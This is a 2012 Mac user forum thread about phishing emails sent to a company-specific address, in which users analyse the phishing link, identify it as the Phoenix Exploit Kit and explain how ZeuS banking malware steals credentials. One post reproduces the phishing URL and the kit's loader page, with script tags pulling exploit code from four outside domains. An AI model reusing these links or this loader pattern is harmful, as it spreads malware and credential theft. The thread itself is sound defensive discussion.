An open community 
of Macintosh users,
for Macintosh users.

FineTunedMac Dashboard widget now available! Download Here

Previous Thread
Next Thread
Print Thread
anyone else getting Smith Micro spam?
#21059 03/13/12 04:01 PM
Joined: Aug 2009
OP Offline

Joined: Aug 2009
I make new addresses for the different businesses I email to, so I can tell who is responsible for spam and phishing.

I started receiving phishing emails a few days ago to the address I created for emailing Smith Micro. I think they're the ones that bought out Stuffit? Anyone else getting these?

Both times in the past I've tried to call and complain about someone getting me on a spam/phish list (Ford and NewEgg most recently) they've denied the possibility of any involvement. (not surprising I suppose)

Last edited by cyn; 03/16/12 04:50 PM. Reason: Topic moved from the Lounge to the Networking forum.

I work for the Department of Redundancy Department
Re: anyone else getting Smith Micro spam?
Virtual1 #21082 03/15/12 05:09 PM
Joined: Aug 2009
Likes: 1
Offline

Joined: Aug 2009
Likes: 1
Generally speaking, if you start getting spam to an email address, therre are a few possibilities:

- The spammers found it on a Web site, forum, or email group.
- The spammers found it by doing a dictionary attack.
- You used it on a Web site or online ordering system that was hacked.
- You gave it to someone who gave, sold, or rented it to the spammers.
- You gave it to someone who was then hacked.
- You gave it to someone who is infected with an email-scraping virus.

If this email was created only for Smith Micro, that rules out the first two possibilities, leaving only the bottom four. Smith Micro probably didn't intentionally sell it on to phishers, which means they have been hacked, they are using a computer infected with a virus, or the spammers found the email address by using a brute-force dictionary attack.

How unusual is the email address? Does it use dictionary words?


Photo gallery, all about me, and more: www.xeromag.com/franklin.html
Re: anyone else getting Smith Micro spam?
tacit #21083 03/15/12 05:14 PM
Joined: Aug 2009
OP Offline

Joined: Aug 2009
I typically use "v1" and the company name, @vftp.net as my alias. I obviously don't post it publicly. The prepending of "v1" to the start of the addresses makes them fairly resistant to dictionary attacks. I've checked my server logs a few times in the past looking for such mischief and other than the expected dictionary attempts I don't see much.

So I follow the same conclusion as you, hacked or botnetted. Either way probably a waste of my time to contact them, they're unlikely to admit to either.


I work for the Department of Redundancy Department
Re: anyone else getting Smith Micro spam?
tacit #21091 03/16/12 02:08 PM
Joined: Aug 2009
OP Offline

Joined: Aug 2009
And I continue to get spam that looks like my "intuit order" is ready. Spam emails originate from Tunisia. The link tries to get me to go here:

http//livonya.com/BNCGCPNP/index.html
(attempting to autolink that url was not appreciated, ubb)

which does a really odd thing, it does a few redirects and ends me at microsoft.com. I assume it's doing some kind of a vulnerability test and determining their driveby download isn't going to work, and ditches me at microsoft?

Or maybe a cocktail? Curling that URL gives:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="http://africafe.hu/xyv9H9GN/js.js"></script>
<script type="text/javascript" src="http://asflexs.com/5w5txgvh/js.js"></script>
<script type="text/javascript" src="http://phreklam.com/zWNrFqKG/js.js"></script>
<script type="text/javascript" src="http://zizula.ro/RxTXmiNk/js.js"></script>

</html>


I work for the Department of Redundancy Department
Re: anyone else getting Smith Micro spam?
Virtual1 #21095 03/16/12 05:17 PM
Joined: Aug 2009
Likes: 1
Offline

Joined: Aug 2009
Likes: 1
It's the Phoenix Exploit Kit.

The Web site looks at the browser, platform, plugins, and other configuration information, then attempts a cocktail of browser, Java, Flash, and PDF exploits to download the W32/ZeuS malware. I've been seeing a lot of these lately.

W32/ZeuS is a modular, programmable, configurable malware strain that's sold in underground carder communities as a do-it-yourself kit. Once it infects a computer, it waits silently until a person attempts to visit a bank site or a site like PayPal. When that happens, it begins keystroke logging and then sends the person's login credentials to a server under the control of the person who set it up. It uses advanced encryption and other techniques to mask its communication with the server.

Antivirus software is almost 100% useless against ZeuS. Some antiviral programs can detect a handful of older variants; none that I know of can remove it.


Photo gallery, all about me, and more: www.xeromag.com/franklin.html
Re: anyone else getting Smith Micro spam?
tacit #21096 03/16/12 05:44 PM
Joined: Aug 2009
Likes: 1
Online

Joined: Aug 2009
Likes: 1
> Antivirus software is almost 100% useless against ZeuS.

But will Little Snitch attempt to protect people from being victimized by the exploit by reporting the "phone-home?"

Edit: I forgot to ask how it gets itself installed.

Edit 2: Google indicates that it's Windows only.

Last edited by artie505; 03/16/12 06:06 PM.

The new Great Equalizer is the SEND button.

In Memory of Harv: Those who can make you believe absurdities can make you commit atrocities. ~Voltaire
Re: anyone else getting Smith Micro spam?
Virtual1 #21097 03/16/12 06:14 PM
Joined: Aug 2009
Likes: 1
Online

Joined: Aug 2009
Likes: 1
> [...] it does a few redirects and ends me at microsoft.com. I assume it's doing some kind of a vulnerability test and determining their driveby download isn't going to work, and ditches me at microsoft?

After seeing that it's Windows only I entered the URL and was taken to what looks like a clothing sales site.

The home page displayed a log-in pane with name and password pre-entered, which I wasn't curious enough to click on.


The new Great Equalizer is the SEND button.

In Memory of Harv: Those who can make you believe absurdities can make you commit atrocities. ~Voltaire
Re: anyone else getting Smith Micro spam?
artie505 #21098 03/16/12 10:35 PM
Joined: Aug 2009
Likes: 1
Online

Joined: Aug 2009
Likes: 1
I forgot to mention in my last post that somewhere on the road to that shopping site I acquired a microsoft.com cookie. Curious?


The new Great Equalizer is the SEND button.

In Memory of Harv: Those who can make you believe absurdities can make you commit atrocities. ~Voltaire
Re: anyone else getting Smith Micro spam?
artie505 #21100 03/17/12 09:35 AM
Joined: Aug 2009
Likes: 1
Online

Joined: Aug 2009
Likes: 1
I'd label it curious. I just checked my cookies and, although I have various Microsoft sites I visit (due to needing support for my Office software), I do not have a cookie called microsoft.com.


ryck

iMac (Retina 5K, 27", 2017), 3.4 GHz Intel Core i5, 8GB RAM, 2400 MHz DDR4
OS Mojave 10.14.6
Canon MX710 Printer
Epson Perfection V500 Photo Scanner
Time Machine on 1TB LaCie USB-C
Carbon Copy Clone on 500GB OWC Mercury OTG Pro
Re: anyone else getting Smith Micro spam?
artie505 #21116 03/19/12 03:44 PM
Joined: Aug 2009
OP Offline

Joined: Aug 2009
Originally Posted By: artie505
> Antivirus software is almost 100% useless against ZeuS.

But will Little Snitch attempt to protect people from being victimized by the exploit by reporting the "phone-home?"

Edit: I forgot to ask how it gets itself installed.

Edit 2: Google indicates that it's Windows only.


AFAIK all the exploits it is using and attempting to install are for windows. After trying to compromise your browser and failing, it dumps you off at some other web page.


I work for the Department of Redundancy Department
Re: anyone else getting Smith Micro spam?
tacit #21117 03/19/12 03:46 PM
Joined: Aug 2009
OP Offline

Joined: Aug 2009
Originally Posted By: tacit
Antivirus software is almost 100% useless against ZeuS. Some antiviral programs can detect a handful of older variants; none that I know of can remove it.


Wow. I didn't know that. What do you do then? reformat and restore safe documents?


I work for the Department of Redundancy Department
Re: anyone else getting Smith Micro spam?
Virtual1 #21155 03/22/12 07:03 AM
Joined: Aug 2009
Likes: 1
Offline

Joined: Aug 2009
Likes: 1
Originally Posted By: Virtual1
AFAIK all the exploits it is using and attempting to install are for windows. After trying to compromise your browser and failing, it dumps you off at some other web page.


Yep. There are several exploit kits that are shopped around to malware writers to help them spread their malware, the two most common being the Blackhole Exploit Kit and the Phoenix Exploit Kit. Both can be configured to drop any malware (not just ZeuS) and both can be configured to send the user elsewhere if the exploits all fail or if the page is loaded in a way that the malware writer doesn't want.

For example, the Phoenix Exploit Kit is often configured in such a way that if you surf to it directly it'll redirect elsewhere; it attempts the exploit if it's loaded in an iFrame. The bad guys then compromise other sites and inject iFrames into them.

Originally Posted By: Virtual1
Wow. I didn't know that. What do you do then? reformat and restore safe documents?


Yep. Microsoft Security Essentials can remove some of the older variants of ZeuS, but for modern variants, or for some other similar malware? Yep, reformat and restore is Microsoft's recommended course of action.


Photo gallery, all about me, and more: www.xeromag.com/franklin.html

Moderated by  alternaut, dianne, MacManiac 

Link Copied to Clipboard
Powered by UBB.threads™ PHP Forum Software 7.7.4
(Release build 20200307)
Responsive Width:

PHP: 7.3.15 Page Time: 0.017s Queries: 38 (0.010s) Memory: 0.7626 MB (Peak: 0.8570 MB) Data Comp: Zlib Server Time: 2020-10-30 21:56:45 UTC
Valid HTML 5 and Valid CSS